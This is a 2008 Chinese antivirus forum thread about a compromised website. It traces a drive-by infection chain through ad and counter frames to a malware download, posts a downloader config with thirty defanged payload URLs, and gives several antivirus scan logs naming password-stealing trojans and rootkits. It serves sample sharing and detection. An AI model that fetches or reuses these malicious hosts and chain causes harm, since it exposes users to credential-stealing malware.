http://dealer.gobee.cn/test/5.html马马来了, 不知那个命令生成的

显示全部楼层 · 发表于 2008-2-28 12:39:26

http://dealer.gobee.cn/test/5.html马马来了, 不知那个命令生成的

===========
go 16:56:56
唉。。。。。。。。。不知道为什么检测不到病毒。。惊惶中。。。
凝逸 16:57:25
系统有补丁
凝逸 16:57:39
你用一个没补丁机子上看
凝逸 16:57:47
http://bbs.kafan.cn/viewthread.php?tid=210290&extra=page%3D1
go 17:04:33
是不是打了补丁就会没事？
凝逸 17:05:22
但上你网站的机子, 不会都有补丁
凝逸 17:05:31
你不中他们会中
go 17:05:42
我们公司的都打了。。。
凝逸 17:05:56
http://bbs.kafan.cn/viewthread.php?tid=210290&extra=page%3D1 看了吗
go 17:07:11
已经K了那广告了~我们现在已经没毒了~
go 17:09:07
麻烦你把那贴的地址改一下~如果你们要测试
可以用http://dealer.gobee.cn/test/5.html
这个地址
go 17:09:47
还有我想问问是不是打了补丁杀毒软件检测不到了？
凝逸 17:10:37
y
go 17:12:12
还有贴那里要改啊~不然会影响我们网站的~别人会以为我们放马的，我们都是受害者~
凝逸 17:14:05
不会 , 放马是计数网站或计数网站让马挂

[ 本帖最后由 qqq000@qq.com 于 2008-2-28 04:16 编辑 ]

显示全部楼层 · 发表于 2008-2-28 12:40:34

我只查到 left.gif count_20[1].htm

[ 本帖最后由 qqq000@qq.com 于 2008-2-28 04:15 编辑 ]

显示全部楼层 · 发表于 2008-2-28 12:46:48

显示全部楼层 · 发表于 2008-2-28 13:00:40

Log is generated by FreShow.
[script]http://ads.adlianmeng.com.cn/gobee.asp?tid68652&gco=&ses=&crn=&adss=&ptc=&loo=   (referer检测，使用http://www.gobee.cn/)
      [frame]http://count.51yse.com/pic/count_20.htm
         [frame]http://count.51yse.com/pic/left.gif
         [frame]http://count.51yse.com/pic/logo.gif
         [script]http://x/mm/pps.js （奇怪的东西）
         [frame]http://count.51yse.com/pic/head.gif
            [object]http://www.52gol.com/xx.exe

[ 本帖最后由 dikex 于 2008-2-28 13:01 编辑 ]

显示全部楼层 · 发表于 2008-2-28 13:05:04

C:\Documents and Settings\Administrator\桌面\xx.exe Heuri.Suspicious.ERNM 启发式扫描还未处理

显示全部楼层 · 发表于 2008-2-28 13:07:51

又是计数的被挂？

xx.txt

[MAIN]
VERSION=2008-2-3

[URL]
1=hxxp://www.52gol.com/xx/1.exe
2=hxxp://www.52gol.com/xx/2.exe
3=hxxp://www.52gol.com/xx/3.exe
4=hxxp://www.52gol.com/xx/4.exe
5=hxxp://www.52gol.com/xx/5.exe
6=hxxp://www.52gol.com/xx/6.exe
7=hxxp://www.52gol.com/xx/7.exe
8=hxxp://www.52gol.com/xx/8.exe
9=hxxp://www.52gol.com/xx/9.exe
10=hxxp://www.52gol.com/xx/10.exe
11=hxxp://www.52gol.com/xx/11.exe
12=hxxp://www.52gol.com/xx/12.exe
13=hxxp://www.52gol.com/xx/13.exe
14=hxxp://www.52gol.com/xx/14.exe
15=hxxp://www.52gol.com/xx/15.exe
16=hxxp://www.52gol.com/xx/16.exe
17=hxxp://www.52gol.com/xx/17.exe
18=hxxp://www.52gol.com/xx/18.exe
19=hxxp://www.52gol.com/xx/19.exe
20=hxxp://www.52gol.com/xx/20.exe
21=hxxp://www.52gol.com/xx/21.exe
22=hxxp://www.52gol.com/xx/22.exe
23=hxxp://www.52gol.com/xx/23.exe
24=hxxp://www.52gol.com/xx/24.exe
25=hxxp://www.52gol.com/xx/25.exe
26=hxxp://www.52gol.com/xx/26.exe
27=hxxp://www.52gol.com/xx/27.exe
28=hxxp://www.52gol.com/xx/28.exe
29=hxxp://www.52gol.com/xx/29.exe
30=hxxp://www.52gol.com/xx/30.exe

样本：

[ 本帖最后由 zzh161 于 2008-2-28 13:20 编辑 ]

显示全部楼层 · 发表于 2008-2-28 13:47:19

很好,很强大!

显示全部楼层 · 发表于 2008-2-28 13:54:52

D:\病毒测试\未解压样本\xx.rar » RAR » 11\1.exe - probably a variant of Win32/Genetik trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\10.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\11.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\12.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\13.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\14.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\15.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\16.exe - a variant of Win32/PSW.OnLineGames.NML trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\17.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\18.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\19.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\2.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\20.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\21.exe - Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\23.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\24.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\25.exe - probably a variant of Win32/Genetik trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\3.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\4.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\5.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\6.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\7.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\8.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
D:\病毒测试\未解压样本\xx.rar » RAR » 11\9.exe - a variant of Win32/PSW.OnLineGames.GJV trojan

显示全部楼层 · 发表于 2008-2-28 14:28:46

Scan Log
Version of virus signature database: 2907 (20080228)
Date: 2008-2-28 Time: 14:27:08
Scanned disks, folders and files: C:\Documents and Settings\Administrator\桌面\xx.rar
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\1.exe - probably a variant of Win32/Genetik trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\10.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\11.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\12.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\13.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\14.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\15.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\16.exe - a variant of Win32/PSW.OnLineGames.NML trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\17.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\18.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\19.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\2.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\20.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\21.exe - Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\23.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\24.exe - a variant of Win32/PSW.OnLineGames.MUG trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\25.exe - probably a variant of Win32/Genetik trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\3.exe - probably a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\4.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\5.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\6.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\7.exe - a variant of Win32/PSW.OnLineGames.NFL trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\8.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
C:\Documents and Settings\Administrator\桌面\xx.rar » RAR » 11\9.exe - a variant of Win32/PSW.OnLineGames.GJV trojan
Number of scanned objects: 26
Number of threats found: 24
Time of completion: 14:27:19 Total scanning time: 11 sec (00:00:11)

显示全部楼层 · 发表于 2008-2-28 14:41:43

看到beta5 的计数，真难受啊

、
Begin scan in 'C:\Documents and Settings\haha\桌面\xx.rar'
C:\Documents and Settings\haha\桌面\xx.rar
  [0] Archive type: RAR
--> 11\1.exe
      [DETECTION] Is the Trojan horse TR/Drop.Agent.djg.2
  --> 11\10.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
--> 11\11.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
      --> Object
         [4] Archive type: RSRC
         --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.pmi.12
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
--> 11\12.exe
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
--> 11\13.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
      --> Object
         [4] Archive type: RSRC
         --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rti.1
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
  --> 11\14.exe
   [DETECTION] Is the Trojan horse TR/BHO.aya.1
--> 11\15.exe
      [DETECTION] Contains suspicious code HEUR/Malware
--> 11\16.exe
      [DETECTION] Contains suspicious code HEUR/Malware
--> 11\17.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
      --> Object
         [4] Archive type: RSRC
         --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.3
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
--> 11\18.exe
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
--> 11\19.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
--> 11\2.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
--> 11\20.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
      --> Object
         [4] Archive type: RSRC
         --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.9
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
--> 11\21.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
      --> Object
         [4] Archive type: RSRC
         --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rjh.2
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
--> 11\23.exe
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
--> 11\24.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
      --> Object
         [4] Archive type: RSRC
         --> Object
            [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rti.4
      [DETECTION] Is the Trojan horse TR/Rootkit.Gen
--> 11\25.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.Steal.44656
--> 11\3.exe
      [DETECTION] Is the Trojan horse TR/Onlinegames.rxt
--> 11\4.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.RSM.2
--> 11\5.exe
      [DETECTION] Is the Trojan horse TR/Dropper.Gen
--> 11\6.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.NSR.394
--> 11\7.exe
   --> Object
      [2] Archive type: RSRC
      --> Object
         [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.rsl.6
--> 11\8.exe
      [DETECTION] Is the Trojan horse TR/Spy.Gen
  --> 11\9.exe
   [DETECTION] Is the Trojan horse TR/PSW.OnLineGame.XO
   [INFO]    A backup was created as '47f4581d.qua'  ( QUARANTINE )

End of the scan: 2008年2月28日  14:41
Used time: 00:04 min

The scan has been done completely.

   0 Scanning directories
   26 Files were scanned
   28 viruses and/or unwanted programs were found
   5 Files were classified as suspicious:
   0 files were deleted
   0 files were repaired
   1 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   -2 Files not concerned
   1 Archives were scanned
   0 Warnings
   0 Notes

[病毒样本] http://dealer.gobee.cn/test/5.html马马来了, 不知那个命令生成的

本帖子中包含更多资源